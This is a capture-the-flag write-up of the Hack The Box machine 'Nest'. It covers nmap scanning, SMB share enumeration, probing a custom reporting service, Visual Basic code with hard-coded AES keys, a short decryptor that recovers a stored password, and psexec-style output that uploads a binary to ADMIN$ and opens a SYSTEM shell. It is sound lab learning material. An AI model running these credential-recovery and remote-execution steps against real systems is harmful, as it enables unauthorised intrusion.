```
~/Documents/HTB/Nest root@kali ❯ cat nmap_All.txt
# Nmap 7.80 scan initiated Tue Feb 4 21:59:16 2020 as: nmap -sC -sV -oN nmap_All.txt -p- 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.33s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSVersionBindReqTCP, NULL, RPCCheck:
|     Reporting Service V1.2
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     Reporting Service V1.2
|_    Unrecognised command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=2/4%Time=5E397FB6%P=x86_64-pc-linux-gnu%r(NUL
SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine
SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised
SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20
SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n
SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman
SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n
SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor
SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>");

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 4 22:30:41 2020 -- 1 IP address (1 host up) scanned in 1884.97 seconds
```
Nmap shows only two open ports: 445 and 4386, the latter running a service it could not identify. Port 445 is SMB.
```
~/Documents/HTB/Nest root@kali ❯ smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	Secure$         Disk
	Users           Disk
SMB1 disabled -- no workgroup available
```
```
~/Documents/HTB/Nest root@kali ❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>help debug

DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed

Examples:
DEBUG MyPassw0rd
Attempts to enable debug mode by using the password "MyPassw0rd"
>
```
As shown, the DEBUG command requires a password, so the first step is to find it.
User.txt
We find that we have permission to read the Shared folder inside the Data share over SMB.
```
~/Documents/HTB/Nest root@kali 9s ❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \IT\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Reports\*
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
```
```
~/Documents/HTB/Nest root@kali 26s ❯ smbclient \\\\10.10.10.178\\Secure$ -U tempuser
Enter WORKGROUP\tempuser's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Aug  8 07:08:12 2019
  ..                                  D        0  Thu Aug  8 07:08:12 2019
  Finance                             D        0  Thu Aug  8 03:40:13 2019
  HR                                  D        0  Thu Aug  8 07:08:11 2019
  IT                                  D        0  Thu Aug  8 18:59:25 2019

		10485247 blocks of size 4096. 6545194 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> dir
  .                                   D        0  Thu Aug  8 03:42:14 2019
  ..                                  D        0  Thu Aug  8 03:42:14 2019
  Docs                                D        0  Thu Aug  8 03:44:00 2019
  Reports                             D        0  Tue Aug  6 21:45:40 2019
  VB Projects                         D        0  Tue Aug  6 22:41:55 2019

		10485247 blocks of size 4096. 6545194 blocks available
```
```
~/Documents/HTB/Nest/VB Projects/WIP/RU/RUScanner root@kali ❯ cat Utils.vb
```

```vb
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    ' Passphrase, salt, iteration count and IV are all string constants in the source,
    ' so anyone holding this file (or the compiled assembly) can decrypt every string it protects.
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        ' Rfc2898DeriveBytes is PBKDF2-HMAC-SHA1; keySize is in bits, so /8 gives the key length in bytes
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                                   encryptor, _
                                                   CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                                   As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        ' VB ReDim takes an upper bound, so this buffer is one byte longer than the ciphertext
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        ' The listing on this page ends at the line above; the return and closing statements are restored here
        Return plainText
    End Function

End Class
```
```vb
Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1

    Public Sub Main()
        Console.WriteLine(DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="))
        Console.ReadLine()
    End Sub

    ' Same routine as Utils.vb, with a different hard-coded passphrase, salt, iteration count and IV
    Public Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        End If
    End Function

    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)

        ' The listing on this page ends at the line above; the return and closing statements are restored here
        Return plainText
    End Function

End Module
```
```
~/Documents/HTB/Nest root@kali 24m 48s ❯ smbclient \\\\10.10.10.178\\users -U c.smith
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jan 26 07:04:21 2020
  ..                                  D        0  Sun Jan 26 07:04:21 2020
  Administrator                       D        0  Fri Aug  9 23:08:23 2019
  C.Smith                             D        0  Sun Jan 26 15:21:44 2020
  L.Frost                             D        0  Fri Aug  9 01:03:01 2019
  R.Thompson                          D        0  Fri Aug  9 01:02:50 2019
  TempUser                            D        0  Thu Aug  8 06:55:56 2019

		10485247 blocks of size 4096. 6447114 blocks available
smb: \> cd C.smith
smb: \C.smith\> dir
  .                                   D        0  Sun Jan 26 15:21:44 2020
  ..                                  D        0  Sun Jan 26 15:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 07:06:17 2019
  user.txt                            A       32  Fri Aug  9 07:05:24 2019

		10485247 blocks of size 4096. 6447114 blocks available
smb: \C.smith\> get user.txt
getting file \C.smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.smith\> cd "HQK Reporting"
smb: \C.smith\HQK Reporting\> dir
  .                                   D        0  Fri Aug  9 07:06:17 2019
  ..                                  D        0  Fri Aug  9 07:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 20:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 07:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 07:09:05 2019

		10485247 blocks of size 4096. 6543918 blocks available
smb: \C.smith\HQK Reporting\>
```
```
[*] Requesting shares on 10.10.10.178.....
[*] Found writable share ADMIN$
[*] Uploading file fLgfGSwC.exe
[*] Opening SVCManager on 10.10.10.178.....
[*] Creating service xaOM on 10.10.10.178.....
[*] Starting service xaOM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
```